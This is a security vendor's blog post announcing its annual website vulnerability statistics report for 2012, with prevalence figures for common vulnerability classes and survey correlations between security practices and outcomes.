This year, our 6th, we’ve done things differently. We wanted to try something truly ambitious, something that advances our collective understanding of application security, and something that to our knowledge has never been done before!
So, in addition to releasing detailed website vulnerability metrics that the community has come to rely upon, we sought to measure the impact of today’s so-called “best-practices.” To find out if activities such as software security training for developers, pre-production testing, static code analysis, web application firewalls, etc. really do lead to better security metrics and fewer breaches. To answer the fundamental question, what aspects of an SDLC program actually do make a difference – and how much? Of course, every “expert” has an opinion on the matter, but the best most anyone has is personal anecdote. That is, until now.
To get there we asked all Sentinel customers to privately share details about their SDLC and application security program in a survey format – we received 76 total responses. We then aggregated and correlated their answers to their website vulnerability outcomes and reported breaches. The results of this data combination are nothing less than stunning, enlightening, and often confusing.
To give you a taste for the full report, let’s start with the high-level basics:
The average number of serious* vulnerabilities per website continues to decline, going from 79 in 2011 down to 56 in 2012. This was not wholly unsuspected. Despite this, 86% of all websites tested were found to have at least 1 serious vulnerability during 2012. Of the serious vulnerabilities found, on average 61% were resolved and they took an average of 193 days to get resolved from the date of notification.
As far as the Top Ten most prevalent vulnerability classes in 2012, the list is relatively close to last year’s – though Information Leakage surpassed Cross-Site Scripting yet again:
- Information Leakage – 55% of websites
- Cross-Site-Scripting – 53% of websites
- Content Spoofing – 33% of websites
- Cross-site Request Forgery – 26% of websites
- Brute Force –26% of websites
- Fingerprinting – 23% of websites
- Insufficient Transport Layer Protection –22% of websites
- Session Fixation – 14% of websites
- URL Redirector Abuse – 13% of websites
- Insufficient Authorization – 11% of websites
Conspicuously absent is SQL Injection, which fell from #8 to #14 from 2011 to 2012, and now identified in only 7% of websites. Obviously vulnerability prevalence alone does not solely equate to exploitation.
When we took a closer look at some of the correlations of vulnerability and survey data, we found some counter-intuitive statistics – implying that software security controls, or “best practices” do not necessarily lead to better security – at least at all times in all cases:
- 57% of organizations surveyed provide some amount of instructor-led or computer-based software security training for their programmers. These organizations experienced 40% fewer vulnerabilities, resolved them 59% faster, but exhibited a 12% lower remediation rate.
- 39% of organizations said they perform some amount of Static Code Analysis on their website(s) underlying applications. These organizations experienced 15% more vulnerabilities, resolved them 26% slower, and had a 4% lower remediation rate.
- 55% of organizations said they have a Web Application Firewall (WAF) in some state of deployment. These organizations experienced 11% more vulnerabilities, resolved them 8% slower, and had a 7% lower remediation rate.
Two questions we posed in our survey illustrated that compliance is the number one driver for fixing web vulnerabilities…while it was also the number one driver for not fixing web vulnerabilities. Proponents of compliance often suggest that mandatory regulatory controls be treated as a “security baseline,” a platform to raise the floor, and not represent the ceiling. While this is a nice concept in casual conversation, this is typically not the real-world reality we see.
The last point I want to bring up for now focuses on accountability in the event of a data breach. Should an organization experience a website or system breach, WhiteHat Security found that 27% said the Board of Directors would be accountable. Additionally, 24% said Software Development, 19% Security Department, and 18% Executive Management. Here’s where things get really interesting though. By analyzing the data in this report, we see evidence of a direct correlation between increased accountability and decreased breaches, and of the efficacy of “best-practices” and security controls.
We stopped short of coming to any strong conclusions based upon this data alone. However, we now have something solid to work from in establishing new theories and avenues of research to explore. Please, have a look at the report and let us know what stands out to you. What are your theories for why things are the way they are? If you’d like different slices of the data, we’re all ears.
#WebsiteVulnStats
Twitter to @jeremiahg and @whitehatsec.
Personal side note: I would like to thank all of our customers who responded to our survey earlier this year as well as to a select group of respected individuals in the security space (they know who they are) that got a sneak peek of our findings last week and whose feedback was invaluable. Also thank you to my colleagues Gabriel Gumbs, Sevak Tsaturyan, Siri De Licori, Bill Coffman, Matt Johansen, Johannes Hoech, Kylie Heintz, and Michele Cox, whose teamwork helped bring everything together.